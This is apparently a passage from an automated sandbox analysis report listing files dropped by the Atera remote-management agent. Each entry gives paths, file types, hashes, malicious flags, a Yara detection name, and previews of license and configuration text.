                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1927
                                                                                                                                                                                                                                        Entropy (8bit):4.78095675693374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:aCpXZHRo7dL53iEu+byAHsv7g6z0zBZfNP3VyFA:dlq7XTu+xCz0NxxVwA
                                                                                                                                                                                                                                        MD5:899A48828B85C4B0402EE7CF1F65B62B
                                                                                                                                                                                                                                        SHA1:73BA604E5A4E4EA6FB4AD23B8ADF3982B2C82D10
                                                                                                                                                                                                                                        SHA-256:20343526E04CE61EED2675282462E7080D305246F7807386621149C2025765D9
                                                                                                                                                                                                                                        SHA-512:EFD02998961261FFA64332EA13876906D55A8BD8209BF94F922D97889DDF1181129B6A08E5747F1C0A07E69CFC3A05E86D18AFC3E06325B51598F52360881B1B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview: 7-Zip.. ~~~~~.. License for use and distribution.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.... 7-Zip Copyright (C) 1999-2016 Igor Pavlov..... Licenses for files are:.... 1) 7z.dll: GNU LGPL + unRAR restriction.. 2) All other files: GNU LGPL.... The GNU LGPL + unRAR restriction means that you must follow both .. GNU LGPL rules and unRAR restriction rules....... Note: .. You can use 7-Zip on any computer, including a computer in a commercial .. organization. You don't need to register or pay for 7-Zip....... GNU LGPL information.. --------------------.... This library is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This library is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABI
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29184
                                                                                                                                                                                                                                        Entropy (8bit):5.423222213276874
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:02aUriLtuRZFwdpyTmNSHSBLVogO6QlRSO/:1r0ARZF6NFVogjQlRv/
                                                                                                                                                                                                                                        MD5:5CA71CBFF5A8DE7E5E30B6E94CD42069
                                                                                                                                                                                                                                        SHA1:991701A32492D743430627CBFBD56D6884C32588
                                                                                                                                                                                                                                        SHA-256:23FBD1EE66FCE6872E97B2FE84C409AB30A74FE8720B722BC6F8BAE6E7764C04
                                                                                                                                                                                                                                        SHA-512:77E31EC0DCA4E4895D3A4C0E84C6C1516D94089763F1735CAC150EFCD4EEC36107BB810E24D94C1208B7A80881D858DBFE887B32DA6F6D8F0C48F21C2525D0BE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):150
                                                                                                                                                                                                                                        Entropy (8bit):4.731888600769331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:vFWWMNHU8LdgCQcIMOofoObWNRXGws8FLu+gNlFueRObK4QIMOn:TMVBd1IGPKNxgUaNNu5W4QIT
                                                                                                                                                                                                                                        MD5:E9AD5DD7B32C44F8A241DE0E883D7733
                                                                                                                                                                                                                                        SHA1:034C69B120C514AD9ED83C7BAD32624560E4B464
                                                                                                                                                                                                                                        SHA-256:9B250C32CBEC90D2A61CB90055AC825D7A5F9A5923209CFD0625FCA09A908D0A
                                                                                                                                                                                                                                        SHA-512:BF5A6C477DC5DFEB85CA82D2AED72BD72ED990BEDCAF477AF0E8CAD9CDF3CFBEBDDC19FA69A054A65BC1AE55AAF8819ABCD9624A18A03310A20C80C116C99CC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <enforceFIPSPolicy enabled="false"/>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95
                                                                                                                                                                                                                                        Entropy (8bit):4.721635609555772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:SZdFVJMXLreqXy1Wfardzl7BZyOX35++n:Sls/t+WfKj+OXV
                                                                                                                                                                                                                                        MD5:A10B78183254DA1214DD51A5ACE74BC0
                                                                                                                                                                                                                                        SHA1:5C9206F667D319E54DE8C9743A211D0E202F5311
                                                                                                                                                                                                                                        SHA-256:29472B6BE2F4E7134F09CC2FADF088CB87089853B383CA4AF29C19CC8DFC1A62
                                                                                                                                                                                                                                        SHA-512:CAE9F800DA290386DE37BB779909561B4EA4CC5042809E85236D029D9125B3A30F6981BC6B3C80B998F727C48EB322A8AD7F3B5FB36EA3F8C8DD717D4E8BE55E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:CheckSum is licensed as Apache v2 - https://raw.github.com/ferventcoder/checksum/master/LICENSE
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):565672
                                                                                                                                                                                                                                        Entropy (8bit):5.0581002983018335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hjgGwLGK4Uk0Ycoi6DdP51S2XI5cgGlKFTvr5pgx1v9/oLUmP9nVy:h7wj4kYcopdPm2ac8+1vVmPHy
                                                                                                                                                                                                                                        MD5:F7B6AA803BE23C3192FCC2058D208F44
                                                                                                                                                                                                                                        SHA1:A9569D1A4948FD33D388BB263B5CFF0D66E3BB34
                                                                                                                                                                                                                                        SHA-256:D489923F1F91954B8AA15CD0E763132B9033780481D850D74395F5AB6E266C7C
                                                                                                                                                                                                                                        SHA-512:7FD6E1B291503AC9A67128BAC2D6C8F21B40CE9DE99E015866FC62C79CBBAFCD25F3F43A0EB77A00B20C1D6BE9504E85458D503647BF2CF93BC71DAFB64AF122
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3758
                                                                                                                                                                                                                                        Entropy (8bit):4.882012677800436
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:wwVl/ldfbBaq9k4KM8da2J7LbyM71wKPC/:rVl/ldfsn4KM8daU7LP5wn/
                                                                                                                                                                                                                                        MD5:89AC7C94D1013F7B3E32215A3DB41731
                                                                                                                                                                                                                                        SHA1:1511376E8A74A28D15BB62A75713754E650C8A8D
                                                                                                                                                                                                                                        SHA-256:D4D2EF2C520EC3E4ECFF52C867EBD28E357900E0328BB4173CB46996DED353F4
                                                                                                                                                                                                                                        SHA-512:9BA2B0029E84DE81FFEF19B4B17A6D29EE652049BB3152372F504A06121A944AC1A2B1B57C6B0447979D5DE9A931186FEF9BD0667D5358D3C9CB29B817533792
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:Shim Generator - shimgen.exe..Copyright (C) 2017 - Present Chocolatey Software, Inc ("CHOCOLATEY")..Copyright (C) 2013 - 2017 RealDimensions Software, LLC ("RDS")..===================================================================..Grant of License..===================================================================..ATTENTION: Shim Generator ("shimgen.exe") is a closed source application with..a proprietary license and its use is strictly limited to the terms of this ..license agreement.....RealDimensions Software, LLC ("RDS") grants Chocolatey Software, Inc a revocable, ..non-exclusive license to distribute and use shimgen.exe with the official ..Chocolatey client (https://chocolatey.org). This license file must be stored in ..Chocolatey source next to shimgen.exe and distributed with every copy of ..shimgen.exe. The distribution or use of shimgen.exe outside of these terms ..without the express written permission of RDS is strictly prohibited.....While the source for shimgen.exe is
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1185456
                                                                                                                                                                                                                                        Entropy (8bit):7.999660178690134
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:Ssoja9MaLduouhVlf0tyv29r1+IdjkaCgs54gvUokF4fEFBb:HoFOJuhV+tyor1+I+aqdM2MFBb
                                                                                                                                                                                                                                        MD5:6C6F85E896655A6EB726482F04C49086
                                                                                                                                                                                                                                        SHA1:2E0C55CD4894117428B34D21A1D53738FCE4B02C
                                                                                                                                                                                                                                        SHA-256:E109400A93FEDE90201BBF37C1868C789888BCE9D03A4AE5B46C48599939C34E
                                                                                                                                                                                                                                        SHA-512:B58303C149DEFFC9E374D5BA42A8A73B7CE890D35F9589FE0B09ACEC541A21D589D49FA5086B965277FA22DFE308357505124F13A6FF1E0DE415EBC40CE61E15
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55344
                                                                                                                                                                                                                                        Entropy (8bit):6.139210251385105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:N2Xj3YqBmARWhNqjxcVqnOvdBsqW/BCiFl0scb/MV7Hx/:wX5BqSBjb0tb/MVJ
                                                                                                                                                                                                                                        MD5:77C613FFADF1F4B2F50D31EEEC83AF30
                                                                                                                                                                                                                                        SHA1:76A6BFD488E73630632CC7BD0C9F51D5D0B71B4C
                                                                                                                                                                                                                                        SHA-256:2A0EAD6E9F424CBC26EF8A27C1EED1A3D0E2DF6419E7F5F10AA787377A28D7CF
                                                                                                                                                                                                                                        SHA-512:29C8AE60D195D525650574933BAD59B98CF8438D47F33EDF80BBDF0C79B32D78F0C0FEBE69C9C98C156F52219ECD58D7E5E669AE39D912ABE53638092ED8B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2010
                                                                                                                                                                                                                                        Entropy (8bit):5.013965898836397
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrb7O7Rgdp+1/gYoSagFsg+w3Sg+Cag+XgjdgDt:7rne4wCNj
                                                                                                                                                                                                                                        MD5:0B17B3BE9B3A6F6879998D280941DE55
                                                                                                                                                                                                                                        SHA1:EDE825B51EE11AF7C9221DCE596BB969CD068529
                                                                                                                                                                                                                                        SHA-256:1D69336E421C535CECF2E0326BE39B44EEC8EA39754AC8E855D8E0368E0F4619
                                                                                                                                                                                                                                        SHA-512:06D9CC03B8F7295A6E02376159EA96A83CAED4B584769370C0BF365B25D29C883BA5C8359CFEB7316D13C93B49FD37CCA267F6E7931220CED71435E1F4B639C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                        Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                        MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                        SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                        SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                        SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=1.6
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93232
                                                                                                                                                                                                                                        Entropy (8bit):6.195903304850222
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:zSvbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hx9:zS8UMW+BV5M+5Nn0kom/RS3
                                                                                                                                                                                                                                        MD5:B969BFF44179BF8A3584EEB9E026CAE1
                                                                                                                                                                                                                                        SHA1:DBA7A528F51870B89AED549E81EF0660F43B2943
                                                                                                                                                                                                                                        SHA-256:5EE05D3796AB12ECF7F2D32D48D41D2A2A3FD257AD8456A0EBD5E6019492ECF1
                                                                                                                                                                                                                                        SHA-512:F0643905258D2C09CA0A6C30A0A9AD5AD2FE184A65B7FFA5B7B731FEE8357672B35246626A10B39DF7C18EF1B75328192495685DDF9CD2F524E913D6A2993E18
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.998418289121845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6iLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7HxlF:/Z0PMcjrgF
                                                                                                                                                                                                                                        MD5:3AB0B86F5D058374AC789F05FB6C6E81
                                                                                                                                                                                                                                        SHA1:4C8142A6EA10F48735429B125ADC278178FA0082
                                                                                                                                                                                                                                        SHA-256:5F773968BD0501D91C4AE1339D248B4F766C39885B35088953AFB1BE6FBCC4E8
                                                                                                                                                                                                                                        SHA-512:1A6CC62361FDD20A99D9551E677269D9D67B6F4B66C09083E07AE5732C23FFE15A5E687437A16A27896A19DECEB9F23D7614B6CC44445C365E3A59DED1AEE6E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.6559468525212
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:wXh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl55qz:wXh+tYmNyb8E9VF6IYinAM+oCaF5qz
                                                                                                                                                                                                                                        MD5:8E2D0F47E477FAE8132492A31B26F1B3
                                                                                                                                                                                                                                        SHA1:6C3EB7CB1D5E942DC6A62767A701D201E2F69CE1
                                                                                                                                                                                                                                        SHA-256:7C8CD3B61286AAC09534541EDBFF10618938236830167581BD3E922CA55A1456
                                                                                                                                                                                                                                        SHA-512:B40EA70361F5AFCCB3DC41D38A4F302AEE00B9AAC206AD2DFBD1591A7722AF732BC820C3C66EA3BC0816D4C98E364D1345077EDC786ED19135659AC91E0CFC06
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.23943595769723
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Tu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:KF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                        MD5:D5B69F2C4F5CB0E7D43D7F6C1C87DC7E
                                                                                                                                                                                                                                        SHA1:98FDA78C049D650E47C17D9072E82D87C1B59E9F
                                                                                                                                                                                                                                        SHA-256:6C1325D183C7CC3E516628921005F18BB5A191B0029AF93DFB022CA4C2ABBAE9
                                                                                                                                                                                                                                        SHA-512:D95C5CD5E9DAC57FA9C5DE8645F637363A5E787A8C521B09BFBEA56D01765F4FC31E4080BDCAD28BBD90FDB9BEE1CAB50E95FF13CFAC728405D87C3EFE3A387B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.4113040933608225
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:TQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAMU:T9ML8LW/usybGYVE8mZw+89Wu1e7Hxav
                                                                                                                                                                                                                                        MD5:94B12931B9032E80157DC27422393FEC
                                                                                                                                                                                                                                        SHA1:2B762FCA27538B55ACF736F7D65E293E5F15EAEA
                                                                                                                                                                                                                                        SHA-256:746AD9902D9310CC2F172736AC156018ECD3843BA58C8337DE017074B06CD645
                                                                                                                                                                                                                                        SHA-512:D943A39FDD74627514818DAF3434BD1ABEB4EE10077E8B10414098DDA2972851795A15CBD4CAD73A67D5171446E4A6D844CDF8BD705E72F34B7DA16678097BE9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.1343664856235245
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:5jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvM:5+e55LgIkTmyAAfTnMLvM
                                                                                                                                                                                                                                        MD5:FACA1B5218F8EB76963366A6842E122D
                                                                                                                                                                                                                                        SHA1:41B281ABA7D7FE994EE6C77F7F71042885919EC0
                                                                                                                                                                                                                                        SHA-256:D779F3514666734455B5B2B7AEB035F7E1D7394CD445E332DD4D236E24D5C94E
                                                                                                                                                                                                                                        SHA-512:8F350CB3D0C13A701C67749E103B1E07EE1E2EF8EFE71B70CC728F8E21DC02922BAB241CA256695DAC9B225D450623E9F8DA055EA062E336D7F1CD9D2A3FB6D9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1409
                                                                                                                                                                                                                                        Entropy (8bit):4.992215339808616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dNQjY8L2PRRkMYaWcvJ9AwcPGnJg8vQpyriEWZoEs4h:cb8MRRkMVB9AwVbIQdsoEf
                                                                                                                                                                                                                                        MD5:766E089F9AF0DAD5BFD8B77167D1E0FD
                                                                                                                                                                                                                                        SHA1:0AD55E6BA596EFEB24867DC9FDCE4B3D2F2D904F
                                                                                                                                                                                                                                        SHA-256:1D95ED644BB7D706E5B8EBDCB875B23F8B21C62C53C701EB8B3385F770808D7E
                                                                                                                                                                                                                                        SHA-512:FD8ECF32094577A51579911AC3722D839A7B0874146B909EB8DC944CDB5DA459BFCF7EB64B47EC08F40515E6C38B4C4CBA1F4D9F9EB403E891A8710310DBAECA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation="http://www.nlog-project.org/schemas/NLog.xsd NLog.xsd".. autoReload="true".. throwExceptions="false".. internalLogLevel="Off" internalLogFile="c:\temp\nlog-internal.log">.... optional, add some variables.. https://github.com/nlog/NLog/wiki/Configuration-file#variables.. -->.. <variable name="myvar" value="myvalue"/>.... .. See https://github.com/nlog/nlog/wiki/Configuration-file.. for information on customizing logging rules and outputs... -->.. <targets>.... .. add your targets here.. See https://github.com/nlog/NLog/wiki/Targets for possible targets... See https://github.com/nlog/NLog/wiki/Layout-Renderers for the possible layout renderers... -->.... .. Write events to a file with the date in the filename... <target xsi:type="File" na
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071504659955744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQJ:V1n1p9LdRN39aQZUqM
                                                                                                                                                                                                                                        MD5:17A183A03C34B8EC1C91B3DD0B50E022
                                                                                                                                                                                                                                        SHA1:7D226520BE51BD71D05D7EB56793233794F87DA4
                                                                                                                                                                                                                                        SHA-256:381278035C5A8A4668D31B12F0BF3DEC6544E9668FED84DA038A8D21D233D72D
                                                                                                                                                                                                                                        SHA-512:AD5591F6B90A07C00F10EF19231BB3C766E9E27C2205AB3A32C15B7D0DE0F732A5600665E4302290C771F06370B23E4FF0AC63E51C1F36899F98CCB6BD5F8C01
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960370699367048
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUW:hBA/ZTvQD0XY0AJBSjRlXP36RMGj
                                                                                                                                                                                                                                        MD5:53D8AD0BCDED36C2EEBD4D3C45A60BD7
                                                                                                                                                                                                                                        SHA1:9289840CB0518AF183BB41AB05428A6415B92AAE
                                                                                                                                                                                                                                        SHA-256:07A068EF96EE5F447282B42B1818FDFC372B674893E6742A5F83DDBC4DF13ACD
                                                                                                                                                                                                                                        SHA-512:41B19112B6CCE405E16153354223F4AFF548E9F55EDFDC158588E78D9EAA755E10865D7220B916EC14DAB4181C55C005B161B44AC011419EE85EFF5F65975523
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.11766612253341
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:IZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHex:Ogo0WPVTXgk
                                                                                                                                                                                                                                        MD5:D1BA01295CAEFA1F00261AAA943FFDBC
                                                                                                                                                                                                                                        SHA1:54BE9D6F121721542E1B563804766592C9EBF14E
                                                                                                                                                                                                                                        SHA-256:F425945B4D1BD5D65776EE4FF4330F33947692EA5E797EDA3103B6E380196BAF
                                                                                                                                                                                                                                        SHA-512:DFFE1F15F635FD9C083B51C66DBE5C5C9B16516B8CA036B262765279FBF01FC521D10AE31288CA3FB5DAD4F8B6E744DDA33FB8698267C40970DCA9409178E067
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.678784612747097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpx:tuhMaVmzDC67EpYinAMxCJ
                                                                                                                                                                                                                                        MD5:35082EAB5825C9A9D021B5B97BE382B2
                                                                                                                                                                                                                                        SHA1:4716CBD843C8A2A1AA7ED7C95700672E9A863674
                                                                                                                                                                                                                                        SHA-256:B91E3FA4C89230B668EE2DE7D6824DAB708B981F1AE94E734445154BC8A3F6EC
                                                                                                                                                                                                                                        SHA-512:9F0FFB52E060910662AE7AA020AE836119BC609B3E0E9367C7C9D2F2975FC1DDEB1EC1B2F708704C22D666E778B787679BEE5A3CAB5868C09CCB5B57C9026BA2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
